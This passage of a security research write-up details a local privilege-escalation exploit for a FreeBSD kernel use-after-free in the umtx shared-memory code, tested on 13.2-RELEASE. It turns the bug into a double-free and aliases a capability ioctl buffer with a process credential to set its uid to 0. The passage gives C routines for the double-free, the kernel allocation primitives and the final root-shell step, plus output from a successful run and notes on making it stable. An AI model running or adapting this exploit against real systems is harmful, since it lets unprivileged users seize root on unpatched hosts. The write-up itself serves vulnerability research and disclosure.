While this strategy seems workable, it is somewhat brittle as it relies on these two structures always overlapping in a fruitful way. Rather than continue with this, I opted to focus on a different approach and instead turn the bug into a double-free. This provides us with a much richer exploitable state.
Expanding Options via Double-Free
The FreeBSD kernel does not detect double-frees. This is useful
because if we’re able to turn our use-after-free into a double-free, it
expands the set of objects that we’re able to alias: we would no longer
be restricted to considering what can be manipulated through
shm_ops, but instead through whichever other types we’re
able to combine.
The FreeBSD kernel heap allocator works in a LIFO fashion. This
applies to double-freed elements too: if we free the same
virtual address twice, then the next two allocations from
malloc will return that same virtual address. This
behaviour lets us alias any two objects that come from the same
bucket.
In investigating how we might be able to free our dangling
shmfd again, it’s tempting to consider placing a fake
shmfd using a kernel reallocation primitive (e.g. the
ioctl technique from Strategy Proof-of-Concept) and ensuring
the shm_refs field is set to 1.
Then, by calling close on our file descriptor, we’ll
cause the kernel to call shm_close on our file, which
simply does shm_drop on our prepared data:
void
shm_drop(struct shmfd *shmfd)
{
vm_object_t obj;
if (refcount_release(&shmfd->shm_refs)) {
#ifdef MAC
mac_posixshm_destroy(shmfd);
#endif
rangelock_destroy(&shmfd->shm_rl);
mtx_destroy(&shmfd->shm_mtx);
obj = shmfd->shm_object;
if (!shm_largepage(shmfd)) {
VM_OBJECT_WLOCK(obj);
obj->un_pager.swp.swp_priv = NULL;
VM_OBJECT_WUNLOCK(obj);
}
vm_object_deallocate(obj);
[1] free(shmfd, M_SHMFD);
}
}
We really just want to reach that free at [1], but in
order to get there, the kernel will be interacting with various other
fields such as shm_object. shm_object is
expected to be a legitimate kernel pointer and since it’s located
before the shm_refs field, we’re obliged to
provide a value if we plan on placing a fake shmfd.
It turns out that there’s a different route we can take to triggering
this free at [1].
Recall that the vulnerability gives us a file descriptor with a
dangling shmfd pointer. If we now do another
UMTX_SHM_CREAT operation then we will create a new
umtx_shm_reg and a new shmfd:
- The umtx_shm_reg has a refcount of 1
- The shmfd has a refcount of 2
- Our dangling shmfd will point to the same address as this new shmfd
The shmfd has a refcount of 2 because
UMTX_SHM_CREAT returns us a file descriptor. If we close
that file descriptor, the shmfd will now have a refcount of
1.
We can now call close on our vulnerable file descriptor.
That will call shm_close, which will call
shm_drop on the dangling shmfd. Since the
dangling shmfd now aliases the new shmfd we
just created, this will free the new shmfd while keeping
the umtx_shm_reg in the registry.
Now the umtx_shm_reg entry holds a dangling
shmfd pointer.
Next we perform a UMTX_SHM_LOOKUP operation. Here’s the
relevant part of umtx_shm again:
static int
umtx_shm(struct thread *td, void *addr, u_int flags)
{
struct umtx_key key;
struct umtx_shm_reg *reg;
struct file *fp;
int error, fd;
...
[2] reg = umtx_shm_find_reg(&key);
...
error = falloc_caps(td, &fp, &fd, O_CLOEXEC, NULL);
if (error == 0) {
[3] shm_hold(reg->ushm_obj);
finit(fp, FFLAGS(O_RDWR), DTYPE_SHM, reg->ushm_obj,
&shm_ops);
td->td_retval[0] = fd;
fdrop(fp, td);
}
}
umtx_shm_unref_reg(reg, false);
return (error);
}
At [2], the kernel will find the umtx_shm_reg with the
dangling shmfd and prepare a file descriptor for us. In
setting up this file descriptor, it will call shm_hold on
the freed data [3], bumping the refcount back from 0 to 1 again.
Finally, if we close the resulting file descriptor right
away, we will reach shm_drop again, but this time with all
of the legitimate kernel pointers still in place (since the freed memory
wasn’t zeroed).
We have now performed a double-free.
With this done, now is a good time to remove the
umtx_shm_reg entry since it still holds a dangling pointer
to this double-freed memory. It’s safe to perform a
UMTX_SHM_DESTROY at this point since the shmfd
refcount has returned to zero: in cleaning up the
umtx_shm_reg, the refcount will drop again, but to -1 this
time – which is safe.
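Putting the whole dance together, a sketch (uaf_fd again being the descriptor with the dangling f_data, and key the same key address used for the race):
#include <sys/types.h>
#include <sys/umtx.h>
#include <unistd.h>

static void
double_free(int uaf_fd, void *key)
{
	int fd;

	/* New umtx_shm_reg + shmfd; the dangling pointer aliases the new shmfd. */
	fd = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_CREAT, key, NULL);
	close(fd);		/* shmfd refcount: 2 -> 1 */

	/* First free: shm_close() -> shm_drop() on the aliased shmfd. */
	close(uaf_fd);		/* the registry entry now dangles */

	/* Lookup resurrects the freed shmfd: shm_hold() bumps 0 -> 1... */
	fd = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_LOOKUP, key, NULL);

	/* ...and closing it frees the slot a second time: the double-free. */
	close(fd);

	/* Retire the registry entry still pointing at the slot (safe, as above). */
	_umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, key, NULL);
}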
Now we are in a stable situation with a double-freed
malloc256 element, since the 208-byte shmfd
is served from the 256-byte bucket.
What this means is that the next 2 allocations from the
malloc256 bucket will return the same virtual address. By
choosing which two allocations come from there next, we can choose two
objects to overlap in a useful way.
Aliasing a cap_ioctls_limit Array with ucred
The cap_ioctls_limit syscall will be very useful here.
The purpose of the syscall is to allow userland to specify an allowlist
of permissible ioctl codes for an open file descriptor:
int
sys_cap_ioctls_limit(struct thread *td, struct cap_ioctls_limit_args *uap)
{
u_long *cmds;
size_t ncmds;
int error;
ncmds = uap->ncmds;
if (ncmds > IOCTLS_MAX_COUNT)
return (EINVAL);
if (ncmds == 0) {
cmds = NULL;
} else {
[1] cmds = malloc(sizeof(cmds[0]) * ncmds, M_FILECAPS, M_WAITOK);
[2] error = copyin(uap->cmds, cmds, sizeof(cmds[0]) * ncmds);
if (error != 0) {
free(cmds, M_FILECAPS);
return (error);
}
}
[3] return (kern_cap_ioctls_limit(td, uap->fd, cmds, ncmds));
}
We can see the way this works is to malloc a
user-controlled size [1], fill it with user-controlled content [2] and
attach it to a file descriptor [3].
By calling cap_ioctls_limit with a zero length buffer,
we cause the kernel to free any previously-attached
ioctl limit buffer.
With an ioctl limit buffer in place, we can even read
the contents of it back with the cap_ioctls_get
syscall.
This provides us with:
- The ability to allocate from a range of malloc buckets.
- The ability to fill that allocation with arbitrary data.
- The ability to read the contents of the buffer back.
- The ability to free that buffer whenever we want to.
This is an extremely powerful mechanism for controlling use-after-frees.
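As a sketch, this can be wrapped into a 256-byte allocation primitive (matching the bucket our shmfd came from). Note that the allow-list on a given descriptor can only ever be reduced, so this assumes a fresh descriptor per allocation:
#include <sys/types.h>
#include <sys/capsicum.h>
#include <fcntl.h>
#include <unistd.h>

#define NCMDS	(256 / sizeof(u_long))	/* 32 u_longs land in the 256 bucket */

/* Allocate a controlled 256-byte kernel buffer; returns the owning fd. */
static int
kalloc256(const u_long payload[NCMDS])
{
	int fd = open("/dev/null", O_RDONLY);	/* any file descriptor will do */

	if (fd == -1 || cap_ioctls_limit(fd, payload, NCMDS) == -1)
		return (-1);
	return (fd);
}

/* Read the buffer's current contents back out of the kernel. */
static ssize_t
kread256(int fd, u_long out[NCMDS])
{
	return (cap_ioctls_get(fd, out, NCMDS));
}

/* Free the buffer without giving up the descriptor. */
static void
kfree256(int fd)
{
	cap_ioctls_limit(fd, NULL, 0);
}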
Armed with this knowledge, we will use an ioctl limit
buffer as one of our allocations out of the double-freed address.
Whichever other object we choose as the other allocation for the
double-freed address, we will now be able to read the content through
cap_ioctls_get and even free/replace it with calls to
cap_ioctls_limit.
Looking at the size of a ucred credential structure,
this seems like a perfect candidate to alias since they will be
allocated from the same bucket as shmfd came from (and
hence where our double-free is set up):
(lldb) p sizeof(struct shmfd)
(unsigned long) $0 = 208
(lldb) p sizeof(struct ucred)
(unsigned long) $1 = 256
With our double-freed element in place, the plan is then:
- Allocate once with cap_ioctls_limit.
- Allocate again with a ucred by calling setuid(getuid()) (this is allowed regardless of privilege and results in a new ucred allocation).
- Read the ucred structure through cap_ioctls_get.
- Fix up the cr_uid to be 0 and also increase the cr_ref refcount.
- Free the ioctl buffer with cap_ioctls_limit(NULL).
- Allocate that buffer back again with cap_ioctls_limit(&cred).
The net effect of this is that we’ve changed our process’ credential:
- cr_uid is now 0, so we’ve become root.
- cr_ref has increased – which will be explained now.
Stopping here isn’t enough because we’re in a dangerous position:
closing the file descriptor associated with the ioctl limit
buffer will free our process’ credential, ultimately leading to a panic.
We need to transition to a stable state.
Since we’re now root according to the kernel, we’re free to allocate
ourselves a better credential: we can call
setresuid(0, 0, 0);.
In doing this, the kernel will allocate a new ucred and
drop the refcount on our previous one. Since we increased the
cr_ref as part of our fix-up, this will prevent that
ucred from being freed. Our process will now transition to
the new full-root credential and away from the double-freed memory
slot.
Finally, because the cr_ref didn’t reach zero, our file
descriptor’s ioctl limit buffer holds the only reference to
the double-freed slot – it’s no longer double-freed and so we’ve
restored stability.
We can now call setresgid(0, 0, 0); to fully transition
to a pure root credential, close the ioctl limit file
descriptor and simply drop to a root shell.
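A sketch of this final stabilisation (ioctl_fd, a name assumed here, being the descriptor that owns the aliased allow-list buffer):
#include <err.h>
#include <unistd.h>

static void
secure_root(int ioctl_fd)
{
	/*
	 * The aliased ucred already has cr_uid == 0, so both calls are
	 * permitted and allocate a fresh, legitimate root credential.
	 */
	if (setresuid(0, 0, 0) == -1)
		err(1, "setresuid");
	if (setresgid(0, 0, 0) == -1)
		err(1, "setresgid");

	/* The inflated cr_ref keeps the old slot alive across this close. */
	close(ioctl_fd);

	execl("/bin/sh", "sh", "-i", (char *)NULL);
	err(1, "execl");
}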
Reference Implementation
My reference implementation of the exploit discussed here works in the way described at the end of the previous section:
- We leverage the vulnerability to acquire a file descriptor with a dangling shmfd pointer.
- We create/destroy another SHM through UMTX_OP_SHM to create a double-free.
- We leverage the double-free to alias a cap_ioctls_limit buffer with a ucred struct.
- We use cap_ioctls_get and cap_ioctls_limit again to read/write the ucred in place.
- We transition to a full root credential and close any resources.
- Finally, we drop to /bin/sh -i as root.
Sample output running against a 13.2-RELEASE kernel that I happen to have:
user@freebsd:~/umtx $ uname -a
FreeBSD freebsd 13.2-RELEASE FreeBSD 13.2-RELEASE releng/13.2-n254617-525ecfdad597 GENERIC amd64
user@freebsd:~/umtx $ make && ./umtx
cc -Isrc -c src/kalloc.c -o src/kalloc.o
cc -Isrc -c src/main.c -o src/main.o
cc -Isrc -c src/uaf.c -o src/uaf.o
cc -Isrc -c src/util.c -o src/util.o
cc -Isrc -pthread -o umtx src/kalloc.o src/main.o src/uaf.o src/util.o
[+] racing to create dangling shmfd...
[+] success!
[+] creating umtx_shm_reg with dangling shmfd
[+] doing double-free
[+] allocating placeholder into double slot
[+] allocating cred into double slot
[+] read cred with uid=1001:
0c 4e 1d 81 ff ff ff ff 00 00 03 01 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
02 00 00 00 02 00 00 00 ff ff ff ff 00 00 00 00
00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 e9 03 00 00 e9 03 00 00
e9 03 00 00 02 00 00 00 e9 03 00 00 e9 03 00 00
00 38 31 4c 00 f8 ff ff 00 38 31 4c 00 f8 ff ff
50 70 90 81 ff ff ff ff c0 28 07 03 00 f8 ff ff
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
bc 10 17 68 00 f8 ff ff 10 00 00 00 e9 03 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[+] fixing up and replacing
[+] attempting to secure creds
[+] uid=0, gid=0
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# whoami
root
#
Stability
Empirical testing shows that the probability of failing and triggering a kernel panic largely depends on how busy the kernel heap is while triggering the race condition. This is to be expected, since assumptions are made about which objects will be dispensed from the heap at critical points.
The reference implementation of the exploit was adjusted to improve stability in this way: a first cut constantly created and reaped new threads (for Thread A, Thread B and Thread C) in a loop, but this resulted in fairly common panics.
Adjusting the exploit to use primitive synchronisation between the threads – thereby avoiding auxiliary use of the heap – has proven to stabilise exploitation.
I have not yet observed any panics as a result of this refactoring.